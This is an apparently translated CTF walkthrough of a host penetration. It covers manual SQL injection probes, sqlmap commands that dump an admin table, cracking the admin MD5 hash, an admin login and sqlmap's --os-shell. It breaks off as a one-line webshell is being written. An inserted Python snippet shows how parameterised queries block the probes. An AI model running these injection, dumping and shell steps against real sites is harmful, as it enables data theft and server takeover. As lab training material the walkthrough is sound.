2025-01-16 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)05/31 Report--
This article walks through a CTF host penetration exercise: finding a SQL injection vulnerability, dumping the database with sqlmap, logging in to the admin back end, and getting a command shell on the host. Let's take a look.
Step 1: first, open the target address: http://202.0.0.207
Step 2: find the vulnerability. Clicking through the pages shows that the site is written in PHP and that the URL carries a parameter named cid, so we test that parameter for SQL injection.
We test it manually:
http://202.0.0.207/product.php?cid=3', page exception
http://202.0.0.207/product.php?cid=3 and 1=1, normal
http://202.0.0.207/product.php?cid=3 and 1=2, exception
The page follows the truth value of the condition we appended, so we conclude that there is a SQL injection vulnerability here and that the parameter type is integer.
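The following is an added example, not code from the original article or from the target site. It reproduces the three manual probes above against a query built by string concatenation, next to a hardened lookup that validates the integer and binds it as a parameter. It assumes an in-memory SQLite database and a constructed product table standing in for the site's real back end; "empty" corresponds to the abnormal page seen for and 1=2.

```python
import sqlite3

# Constructed sample data standing in for the site's product table (assumption).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, cid INTEGER, name TEXT)")
    db.executemany("INSERT INTO product (cid, name) VALUES (?, ?)",
                   [(3, "widget"), (3, "gadget"), (4, "other")])
    return db

def lookup_vulnerable(db, cid):
    """Before: the raw URL parameter is concatenated into the SQL text."""
    try:
        rows = db.execute("SELECT name FROM product WHERE cid = " + cid).fetchall()
    except sqlite3.Error:
        return "exception"   # broken SQL syntax surfaces as a page error
    return "normal" if rows else "empty"

def lookup_hardened(db, cid):
    """After: strict integer validation plus a bound parameter."""
    if not (cid.isascii() and cid.isdigit()):
        return "rejected"    # anything that is not a plain integer never reaches SQL
    rows = db.execute("SELECT name FROM product WHERE cid = ?", (int(cid),)).fetchall()
    return "normal" if rows else "empty"

# The baseline request followed by the three probes from the manual test.
PROBES = ["3", "3'", "3 and 1=1", "3 and 1=2"]

def compare():
    """Return {probe: (vulnerable result, hardened result)}."""
    db = make_db()
    return {p: (lookup_vulnerable(db, p), lookup_hardened(db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in compare().items():
        print(f"cid={probe!r:14} vulnerable={before:10} hardened={after}")
```

With the hardened lookup all three probes get the same response, so the page no longer reveals whether the appended condition was true or false.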
We could exploit this by hand with blind injection, but sqlmap also supports blind injection, so to save time we use sqlmap to dump the database.
Step 2: use sqlmap to dump the database
sqlmap -u http://202.0.0.207/product.php?cid=3
sqlmap reports that this parameter is vulnerable to time-based blind injection and UNION query injection.
Next, we enumerate the databases.
sqlmap -u http://202.0.0.207/product.php?cid=3 --dbs
We choose the 510cms database and list its tables.
sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms --tables
Then we list the columns of the 510_admin table.
sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin --columns
Next, dump the data.
sqlmap -u http://202.0.0.207/product.php?cid=3 -D 510cms -T 510_admin -C id,mid,name,passwd,remark --dump
This gives us the password hash of the admin user: 8dbdf8221fcf4bd6ac5a48317baa948c. An online MD5 lookup returns the password adminlwphp.
Step 3: next, find the back-end login page.
Here I use the Yujian ("Imperial Sword") back-end scanner.
First of all, let's look at the source code of the login page to see if there is a flag. Sure enough, we get a flag3 {d3eac3a68b7d3863cc7bd45ba948195d} here.
Next, we log in with the administrator account and password from the dumped database: admin / adminlwphp. Login is successful.
Step 4: look around
Once inside the back end, all we can do for now is look around and collect useful information, to see whether a flag can be taken directly. By chance, we notice the absolute path of the website, CWR Universe www. Given the SQL injection vulnerability, can we get a command shell? Let's try it.
sqlmap -u http://202.0.0.207/product.php?cid=3 --os-shell
Sure enough, we got the command shell, which is a pleasant surprise. Let's see what privileges we currently have on the system.
Step 5: upload and use a one-line webshell
Next, I write a one-line webshell directly.
Echo ^